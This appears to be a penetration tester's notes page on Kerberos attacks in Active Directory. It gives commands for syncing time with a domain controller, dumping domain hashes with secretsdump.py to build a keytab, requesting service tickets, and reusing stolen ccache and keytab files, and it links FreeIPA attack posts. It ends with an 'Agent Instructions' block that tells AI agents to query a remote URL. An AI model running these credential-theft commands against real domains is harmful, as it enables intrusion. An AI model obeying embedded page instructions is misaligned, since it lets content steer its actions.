# Kerberos
*
*
*
*
*
*
*
*
*
*
*
{% embed url="" %}
{% embed url="" %}
## Synchronize Time
Using `ntpdate`:
```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```
Using `faketime`:
```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```
Using LDAP:
```
$ LDAP_TIME=`ldapsearch -x -H ldap://DC01.megacorp.local -s base -b "" currentTime | awk '/currentTime/ {print $2}' | grep -v "requesting:" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/'`
$ LDAP_TIME=`date -d "$LDAP_TIME X hours" '+%Y-%m-%d %H:%M:%S'`
$ echo $LDAP_TIME && sudo date -u -s $LDAP_TIME
```
## Describe Tickets
*
Using [describeTicket.py](https://github.com/fortra/impacket/blob/master/examples/describeTicket.py):
```
$ describeTicket.py --rc4 21c1d44272e8ad1ee9e6b1aed2943688 --aes d38bf2b75fd1732a4cd7e5d129c62f0ed7feaccaff05c6b4a3bf6a9fc2004036 /tmp/snovvcrash.ccache
```
## Decrypt KRB5 Traffic
*
*
{% code title="keytab.sh" %}
```bash
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out
# ---
cat secretsdump.out | grep aad3b435 | awk -F: '{print " (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print " (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt
```
{% endcode %}
## Kerberos on Linux
*
Check `KRB5CCNAME` environment variable contents:
```
$ env | grep KRB5
```
Request TGT supplying password:
```
$ kinit
$ klist
```
List available SPNs:
```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
```
Request TGS for MSSQL service:
```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```
Re-using keytab files to load and renew a TGT:
```
$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```
Re-using ccache files:
```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCACHE=/tmp/krb5cc_31337
$ klist
```
### FreeIPA
*
*
A blog series by [@n0pe\_sled](https://medium.com/@n0pe_sled) on attacking FreeIPA:
* [Building a FreeIPA Lab](https://posts.specterops.io/building-a-freeipa-lab-17f3f52cd8d9)
* [Attacking FreeIPA — Part I Authentication](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
* [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.